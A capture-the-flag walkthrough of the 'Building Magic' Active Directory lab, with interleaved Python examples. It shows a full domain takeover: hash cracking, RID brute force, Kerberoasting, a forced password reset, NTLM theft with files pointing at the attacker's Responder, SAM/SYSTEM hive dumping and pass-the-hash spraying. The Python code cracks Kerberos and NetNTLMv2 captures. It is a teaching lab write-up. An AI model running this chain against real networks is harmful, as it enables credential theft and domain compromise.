Building Magic

AD Challenge Lab (Medium) - by Noah Heroldt & Haik Isikbay

The following post by 0xb0b is licensed under CC BY 4.0


This is the first machine released on Hack Smarter (https://courses.hacksmarter.org/dashboard).

Initially, we are provided with the following scope and leaked database hashes:

Scope and Objective

Objective: As a penetration tester on the Hack Smarter Red Team, your objective is to achieve a full compromise of the Active Directory environment.

Initial Access: A prior enumeration phase has yielded a leaked database containing user credentials (usernames and hashed passwords). This information will serve as your starting point for gaining initial access to the network.

Execution: Your task is to leverage the compromised credentials to escalate privileges, move laterally through the Active Directory, and ultimately achieve a complete compromise of the domain.

Note to user: To access the target machine, add the following entries to your /etc/hosts file, pointing at the target IP (10.1.168.5):

buildingmagic.local
dc01.buildingmagic.local

Leaked Database File:

id  username        full_name             role            password
1   r.widdleton     Ron Widdleton         Intern Builder  c4a21c4d438819d73d24851e7966229c
2   n.bottomsworth  Neville Bottomsworth  Plannner        61ee643c5043eadbcdc6c9d1e3ebd298
3   l.layman        Luna Layman           Planner         8960516f904051176cc5ef67869de88f
4   c.smith         Chen Smith            Builder         bbd151e24516a48790b2cd5845e7f148
5   d.thomas        Dean Thomas           Builder         4d14ff3e264f6a9891aa6cea1cfa17cb
6   s.winnigan      Samuel Winnigan       HR Manager      078576a0569f4e0b758aedf650cb6d9a
7   p.jackson       Parvati Jackson       Shift Lead      eada74b2fa7f5e142ac412d767831b54
8   b.builder       Bob Builder           Electrician     dd4137bab3b52b55f99f18b7cd595448
9   t.ren           Theodore Ren          Safety Officer  bfaf794a81438488e57ee3954c27cd75
10  e.macmillan     Ernest Macmillan      Surveyor        47d23284395f618bea1959e710bc68ef

Recon

The Nmap scan of 10.1.168.5 revealed numerous Windows/Active Directory-related services, including DNS 53, Kerberos 88/464, LDAP 389/636/3268/3269, SMB 139/445, RPC 135/593, and RDP 3389, alongside web services on ports 80 and 8080. This indicates the host is likely a domain controller with both directory services and a web application attack surface.

nmap -Pn 10.1.168.5   

The default script and service scan adds no new information; it only confirms the domain and the DC hostname already given in the scope:

nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,8080 -Pn 10.1.168.5 
BUILDINGMAGIC.LOCAL
DC01.BUILDINGMAGIC.LOCAL

Access as r.widdleton

We begin by cracking the leaked hashes with hashcat. The 32-character hex digests are consistent with raw MD5 (mode 0; NTLM hashes have the same length, so mode 1000 would be the next thing to try if mode 0 yielded nothing), and with rockyou.txt only a single password cracks. hashes.txt holds one username:hash pair per line; --username keeps that mapping, and --show prints the cracked pairs from the potfile once the attack run has finished:

hashcat -a0 -m0 hashes.txt /usr/share/wordlists/rockyou.txt --username --show

Further hashes could be recovered with https://crackstation.net/, which looks them up in precomputed tables rather than running a wordlist.
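As an added example (not part of the original write-up), the following Python turns a leaked table in this layout into the username:hash file that hashcat's --username option expects, and runs a small dictionary attack against it. The rows, the passwords behind them and the mini wordlist are constructed for the example (the usernames mirror the page, the digests do not); the real leaked hashes are not cracked here.

```python
import hashlib


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ntlm_hex(s: str):
    """NT hash = MD4(UTF-16LE(password)). Returns None on Python builds whose
    OpenSSL has no MD4 (common with OpenSSL 3 without the legacy provider)."""
    try:
        return hashlib.new("md4", s.encode("utf-16le")).hexdigest()
    except ValueError:
        return None


# Constructed sample in the leaked file's tab-separated layout. Usernames mirror
# the page, but the digests are MD5 of constructed passwords, not the real hashes.
_SAMPLE_PASSWORDS = {"r.widdleton": "Welcome2024", "t.ren": "safety1st", "b.builder": "hammer!"}
_SAMPLE_ROWS = [("r.widdleton", "Ron Widdleton", "Intern Builder"),
                ("t.ren", "Theodore Ren", "Safety Officer"),
                ("b.builder", "Bob Builder", "Electrician")]
LEAKED_DB = "id\tusername\tfull_name\trole\tpassword\n" + "\n".join(
    f"{i}\t{u}\t{n}\t{r}\t{md5_hex(_SAMPLE_PASSWORDS[u])}"
    for i, (u, n, r) in enumerate(_SAMPLE_ROWS, start=1))

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "Welcome2024", "hammer!", "Summer2023", "safety1st"]


def parse_leaked_db(text: str):
    """Parse the tab-separated dump into dicts keyed by the header row."""
    lines = [l for l in text.splitlines() if l.strip()]
    header = lines[0].split("\t")
    rows = []
    for line in lines[1:]:
        fields = line.split("\t")
        if len(fields) != len(header):
            continue  # skip malformed rows rather than misaligning columns
        rows.append(dict(zip(header, fields)))
    return rows


def hashcat_username_format(rows) -> str:
    """One 'username:hash' line per row, the input format for `hashcat --username`."""
    return "\n".join(f"{r['username']}:{r['password']}" for r in rows)


def identify(digest: str) -> str:
    """A 32-char hex digest is ambiguous: raw MD5 (-m 0) and NTLM (-m 1000) look the same."""
    if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest.lower()):
        return "32 hex chars: raw MD5 (-m 0) or NTLM (-m 1000); try MD5 first for a web app DB"
    return "unknown"


def dictionary_attack(rows, wordlist):
    """Hash every candidate as MD5 and (where available) NTLM and match against the dump."""
    targets = {r["password"].lower(): r["username"] for r in rows}
    cracked = {}
    for word in wordlist:
        for digest in (md5_hex(word), ntlm_hex(word)):
            if digest and digest in targets:
                cracked[targets[digest]] = word
    return cracked


if __name__ == "__main__":
    rows = parse_leaked_db(LEAKED_DB)
    print(hashcat_username_format(rows))
    print(dictionary_attack(rows, WORDLIST))
```

Unsalted MD5 is why a lookup service like CrackStation works at all: the same password always yields the same digest, so a precomputed table answers instantly, and hashcat's potfile plays the same role for your own previous runs.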

From the Nmap scan, we know that SMB is available. We use NetExec to test the cracked passwords and are successful with the user r.widdleton.

nxc smb 10.1.168.5 -u 't.ren' -p 'REDACTED' --shares
nxc smb 10.1.168.5 -u 'r.widdleton' -p 'REDACTED' --shares

We see that there is a share called File-Share, but we have neither read nor write access to it. We do have read access to the IPC$ share, which is all that is needed for a RID brute force (SID-to-name lookups over the LSARPC named pipe).

https://www.netexec.wiki/smb-protocol/enumeration/enumerate-users-by-bruteforcing-rid

Username Enumeration

We check whether there are other users besides those in the leaked database. To do this, we use the aforementioned RID brute force:

nxc smb 10.1.168.5 -u 'r.widdleton' -p 'REDACTED' --rid-brute

This yields the following additional users, which will come in handy later:

h.potch
r.widdleton
r.haggard
h.grangon
a.flatch
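As an added example (not from the original post), here is a small parser that turns the --rid-brute output into the users.txt file used for spraying later on. It keeps only user objects and drops machine accounts, whose long random passwords no spray will ever hit. The output lines below are constructed in NetExec's layout; the account names mirror the page, the RIDs are made up for the example.

```python
import re

# Constructed sample in the line layout NetExec prints for --rid-brute.
# Account names mirror the page; the RIDs are invented for the example.
RID_BRUTE_OUTPUT = """\
SMB  10.1.168.5  445  DC01  500: BUILDINGMAGIC\\Administrator (SidTypeUser)
SMB  10.1.168.5  445  DC01  501: BUILDINGMAGIC\\Guest (SidTypeUser)
SMB  10.1.168.5  445  DC01  512: BUILDINGMAGIC\\Domain Admins (SidTypeGroup)
SMB  10.1.168.5  445  DC01  1000: BUILDINGMAGIC\\DC01$ (SidTypeUser)
SMB  10.1.168.5  445  DC01  1103: BUILDINGMAGIC\\h.potch (SidTypeUser)
SMB  10.1.168.5  445  DC01  1104: BUILDINGMAGIC\\r.widdleton (SidTypeUser)
SMB  10.1.168.5  445  DC01  1105: BUILDINGMAGIC\\r.haggard (SidTypeUser)
SMB  10.1.168.5  445  DC01  1106: BUILDINGMAGIC\\h.grangon (SidTypeUser)
SMB  10.1.168.5  445  DC01  1107: BUILDINGMAGIC\\a.flatch (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType...>)"; names may contain spaces ("Domain Admins").
LINE_RE = re.compile(r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)")


def parse_rid_brute(text: str):
    """Return (rid, domain, name, sid_type) for every line that resolved to an object."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            entries.append((int(m["rid"]), m["domain"], m["name"], m["type"]))
    return entries


def spray_targets(entries, include_machines: bool = False):
    """User accounts only: groups cannot log on, and machine accounts (names ending
    in $) carry long random passwords, so they only add noise to a spray."""
    names = []
    for _rid, _domain, name, sid_type in entries:
        if sid_type != "SidTypeUser":
            continue
        if name.endswith("$") and not include_machines:
            continue
        names.append(name)
    return names


def users_txt(entries) -> str:
    """Contents for the users.txt later fed to `nxc smb ... -u users.txt -H <hash>`."""
    return "\n".join(spray_targets(entries)) + "\n"


if __name__ == "__main__":
    print(users_txt(parse_rid_brute(RID_BRUTE_OUTPUT)), end="")
```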

Access as r.haggard

With the credentials of r.widdleton, we continue the enumeration, this time with BloodHound. Since I had problems with DNS timeouts, I used DNSChef for this case.

dnschef.py --fakeip 10.1.168.5 -q

We run the Python collector (bloodhound-ce.py) with the credentials of r.widdleton, pointing name resolution at the local DNSChef instance:

bloodhound-ce.py --zip -c All -d BUILDINGMAGIC.LOCAL -u r.widdleton -p REDACTED -dc DC01.BUILDINGMAGIC.LOCAL -ns 127.0.0.1

We import the data into BloodHound and analyse it using the built-in Cypher queries and the Outbound Object Control section. r.widdleton has no special permissions, but the query for Kerberoastable users turns up r.haggard.

We use Impacket's GetUserSPNs.py to Kerberoast that account with r.widdleton's credentials and receive the Kerberos 5 etype 23 (RC4-HMAC) TGS-REP blob for r.haggard:

GetUserSPNs.py -dc-host DC01.BUILDINGMAGIC.LOCAL BUILDINGMAGIC.LOCAL/'r.widdleton':'REDACTED' -request

Fortunately, this cracks with hashcat (mode 13100), and we now have access as r.haggard.

hashcat -m13100 -a0 '<HASH>' /usr/share/wordlists/rockyou.txt

Access as h.potch

We take another look at the data collected with BloodHound, this time at r.haggard's Outbound Object Control. The user is able to change h.potch's password (the ForceChangePassword edge). h.potch himself does not appear to have any further permissions or usable relationships in BloodHound, but we will see what else he can do in a moment.

Next, we change the password of h.potch with the credentials of r.haggard using net rpc. Note that this is a destructive action: on a real engagement it locks the legitimate user out and should be agreed with the client and documented.

net rpc password 'h.potch' 'newP@ssword2022' -U 'BUILDINGMAGIC.LOCAL/r.haggard%REDACTED' -S DC01.BUILDINGMAGIC.LOCAL

We enumerate the shares with NetExec again and see that h.potch can both read and write the File-Share share we already discovered.

nxc smb BUILDINGMAGIC.LOCAL -u 'h.potch' -p 'newP@ssword2022' --shares

Shell as h.grangon

However, the share appears to be empty:

smbclient //10.1.168.5/File-Share -U 'BUILDINGMAGIC.LOCAL\h.potch%newP@ssword2022'

But since we can write, we can place a file in the share that, when the folder is opened or viewed in a browser, makes the viewer's machine connect back to us and authenticate, revealing the NetNTLMv2 hash of the calling user. This technique is commonly called NTLM theft. There is a handy tool for generating such files, ntlm_theft (https://github.com/Greenwolf/ntlm_theft).

We prepare the files, with --server set to our own VPN address on tun0,

ntlm_theft.py --verbose --generate modern --server 10.200.0.156 --filename "meetingXYZ"

and set up Responder (with root privileges) on the same interface to catch the authentication:

responder -I tun0

Next, we upload the generated .lnk file to the share (smbclient's put command).

Shortly afterwards Responder logs an NTLMv2-SSP authentication from h.grangon.

Once again, we are able to crack the hash, this time with hashcat mode 5600 (NetNTLMv2):

hashcat -m5600 -a0 '<HASH>' /usr/share/wordlists/rockyou.txt
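As an added example (not part of the original write-up), the following Python shows what hashcat actually does per candidate for the two captured formats on this page: the Kerberoast hash (mode 13100, RC4-HMAC etype 23) and the Responder capture (mode 5600, NetNTLMv2). Both derive the candidate's NT hash (MD4 over UTF-16LE, implemented inline because many Python builds lack MD4), then either decrypt the ticket and recompute its HMAC-MD5 checksum, or recompute the NTProofStr over the server challenge and the client blob. The two sample captures are constructed here from the password "password"; the users, realm and SPN are placeholders, not data from the lab.

```python
import hashlib, hmac, os, struct

M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Compact MD4 (RFC 1320); hashlib's md4 is often missing on OpenSSL 3 builds."""
    rol = lambda x, n: (((x & M32) << n) | ((x & M32) >> (32 - n))) & M32
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a, b, c, d = d, rol(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, rol(a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rol(a + H(b, c, d) + X[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


# --- Kerberoast, hashcat -m 13100: $krb5tgs$23$*user$realm$spn*$checksum$edata2 ---
def krb5tgs23_line(user, realm, spn, nt, plaintext=b"constructed EncTicketPart", confounder=None):
    """Encrypt a ticket body with RC4-HMAC (etype 23, key usage 2) in hashcat's format."""
    k1 = hmac_md5(nt, struct.pack("<I", 2))
    body = (confounder or os.urandom(8)) + plaintext
    checksum = hmac_md5(k1, body)
    edata = rc4(hmac_md5(k1, checksum), body)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def check_krb5tgs23(line: str, candidate: str) -> bool:
    """Per-candidate test: derive K1 and K3 from the NT hash, decrypt, recompute the checksum."""
    checksum, edata = (bytes.fromhex(h) for h in line.rsplit("$", 2)[1:])
    k1 = hmac_md5(nt_hash(candidate), struct.pack("<I", 2))
    return hmac_md5(k1, rc4(hmac_md5(k1, checksum), edata)) == checksum


# --- NetNTLMv2 from Responder, hashcat -m 5600: user::DOMAIN:challenge:NTProofStr:blob ---
def ntlmv2_key(nt: bytes, user: str, domain: str) -> bytes:
    return hmac_md5(nt, (user.upper() + domain).encode("utf-16le"))


def netntlmv2_line(user, domain, nt, server_challenge: bytes, blob: bytes) -> str:
    proof = hmac_md5(ntlmv2_key(nt, user, domain), server_challenge + blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def check_netntlmv2(line: str, candidate: str) -> bool:
    user, _, domain, chal, proof, blob = line.split(":", 5)
    key = ntlmv2_key(nt_hash(candidate), user, domain)
    return hmac_md5(key, bytes.fromhex(chal) + bytes.fromhex(blob)).hex() == proof


def crack(line: str, wordlist):
    """Return the first wordlist entry that verifies against the captured line, else None."""
    check = check_krb5tgs23 if line.startswith("$krb5tgs$23$") else check_netntlmv2
    return next((w for w in wordlist if check(line, w)), None)


# Constructed captures: both "victims" use the password "password" (NT hash 8846f7ea...).
WORDLIST = ["letmein", "Summer2023", "password", "hagrid1"]
SAMPLE_KRB = krb5tgs23_line("r.haggard", "BUILDINGMAGIC.LOCAL", "constructed/spn",
                            nt_hash("password"), confounder=bytes(8))
SAMPLE_NTLM = netntlmv2_line("h.grangon", "BUILDINGMAGIC", nt_hash("password"),
                             bytes.fromhex("1122334455667788"),
                             bytes.fromhex("0101000000000000") + bytes(8) + os.urandom(8) + bytes(4))

if __name__ == "__main__":
    print(crack(SAMPLE_KRB, WORDLIST), crack(SAMPLE_NTLM, WORDLIST))
```

Two things follow from the code. First, both formats are only as strong as the account password, because every step is a cheap MD4/HMAC-MD5/RC4 computation with no salt beyond the username and domain; this is why Kerberoasting is a problem specifically for service accounts with weak passwords, and why AES-only service accounts (etype 17/18) are so much more expensive to attack. Second, for NetNTLMv2 the domain string in the Responder line is part of the key derivation, so the capture must be fed to hashcat exactly as logged.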

In BloodHound, we see that this user is a member of the Remote Management Users group, which allows us to connect to the machine over WinRM (port 5985) with evil-winrm.

We connect with evil-winrm and find the first flag at C:\Users\h.grangon\Desktop\user.txt.

evil-winrm -i DC01.BUILDINGMAGIC.LOCAL -u 'h.grangon' -p 'REDACTED'

Shell as a.flatch

The user holds a dangerous privilege: SeBackupPrivilege. It lets us read any file on the box regardless of its ACL, including saving the SAM and SYSTEM registry hives, from which Impacket's secretsdump can extract the local account hashes.

whoami /priv

We save the hives and download them using evil-winrm. The download of the SYSTEM hive via evil-winrm might take some time.

reg save HKLM\SAM "C:\Users\h.grangon\Documents\SAM"
reg save HKLM\SYSTEM "C:\Users\h.grangon\Documents\SYSTEM"

Next we dump the hashes using Impacket's secretsdump and are now in possession of the local Administrator hash. However, it cannot be used with any of the Impacket exec tools such as wmiexec.py or psexec.py, nor with evil-winrm. This is expected on a domain controller: its SAM holds only the local accounts (the DSRM Administrator), while network logons to the DC are validated against the domain accounts in NTDS.dit.

secretsdump.py -sam './SAM' -system './SYSTEM' LOCAL

Recalling the user list gathered from the RID brute force, we spray the hash against every user we know of (pass-the-hash) and get a hit for a.flatch, who evidently reuses the same password:

nxc smb BUILDINGMAGIC.LOCAL -u users.txt -H REDACTED --continue-on-success

We see that this user is also an Administrator.

We connect to the machine as a.flatch using the hash (pass-the-hash, e.g. evil-winrm's -H option instead of -p).

And we find the final flag at C:\Users\Administrator\Desktop\root.txt.
